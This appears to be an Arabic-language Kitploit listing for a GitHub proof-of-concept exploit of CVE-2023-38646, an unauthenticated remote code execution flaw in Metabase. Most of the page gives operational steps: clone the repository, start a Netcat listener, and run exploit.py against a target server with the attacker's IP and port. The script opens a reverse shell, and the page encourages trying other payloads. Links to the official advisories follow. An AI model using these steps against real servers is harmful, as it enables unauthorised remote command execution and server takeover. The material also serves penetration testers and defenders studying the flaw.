Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38646 — هذا سكربت لإثبات المفهوم (PoC) لاستغلال Metabase، وهي أداة مفتوحة المصدر لذكاء الأعمال وتحليل البيانات. | Kitploit
أدوات/GitHubGitHub/threathntr/cve-2023-38646
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubthreathntr/cve-2023-38646

CVE-2023-38646

هذا سكربت لإثبات المفهوم (PoC) لاستغلال Metabase، وهي أداة مفتوحة المصدر لذكاء الأعمال وتحليل البيانات.

عرض المستودع
111منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-38646 PoC

الوصف

هذا نص برمجي لإثبات المفهوم (PoC) لاستغلال Metabase، وهي أداة مفتوحة المصدر للذكاء التجاري وتحليل البيانات. تتيح Metabase للمستخدمين تصور بياناتهم والتفاعل معها، مما يجعلها منصة قوية لتحليل البيانات.

هذه الثغرة، المعينة بـ CVE-2023-38646، سمحت للمهاجمين بتنفيذ أوامر عشوائية على الخادم دون الحاجة إلى أي مصادقة. كان تأثير هذا الخلل شديدًا، إذ منح وصولًا غير مصرح به إلى الخادم بمستوى صلاحيات الخادم.

خطوات إثبات المفهوم (PoC)

استنساخ هذا المستودع

root@kitploit:~
git clone https://github.com/threatHNTR/CVE-2023-38646.git

الانتقال إلى المستودع

root@kitploit:~
cd CVE-2023-38646

قبل تشغيل السكربت، قم بإعداد مستمع Netcat

root@kitploit:~
nc -nlvp chosen-port

تشغيل السكربت

root@kitploit:~
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port

الاستغلال: سيحاول السكربت إرسال شل عكسي (reverse shell) إلى خادم Metabase المستهدف. إذا نجح، ستحصل على شل على جهازك. لا تتردد في تغيير الحمولة (payload) لتجربة شل عكسية مختلفة.

المراجع

  • نشرة GitHub الأمنية: https://github.com/advisories/GHSA-jg32-8h6w-x7vg

  • نشرة Metabase الأمنية: https://www.metabase.com/blog/security-advisory

  • GitHub الخاص بـ Metabase: https://github.com/metabase/metabase

  • مدونة Assetnote - شق طريقنا إلى Pre-Auth RCE في Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

تنزيل الأداة